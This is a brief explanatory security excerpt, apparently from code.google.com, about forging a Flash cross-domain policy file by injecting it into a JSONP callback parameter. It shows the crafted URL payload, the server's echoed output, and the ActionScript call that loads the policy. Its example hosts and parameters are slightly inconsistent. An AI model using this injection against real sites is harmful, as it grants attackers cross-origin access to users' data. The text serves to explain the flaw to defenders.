Cross-domain policy files (crossdomain.xml) are forgivingly parsed by Flash. If an attacker can construct an HTTP request that results in the server sending back a policy file, then Flash will accept the policy file. For instance, imagine a university website that responds to a course listing request:
http://www.example.com/CourseListing?format=js&callback=<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>...with the following output:
<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>() { return {name:”English101”, desc:”Read Books”}, {name:”Computers101”, desc:”play on computers”}};Then one could load this policy via the following ActionScript? code:
System.security.loadPolicyFile("http://www.university.edu/CourseListing?format=json&callback=<cross-domain-policy>" + "<allow-access-from%20domain=\"*\"/></cross-domain-policy>”);This results in the Flash application having complete cross-domain access to www.example.com.
via code.google.com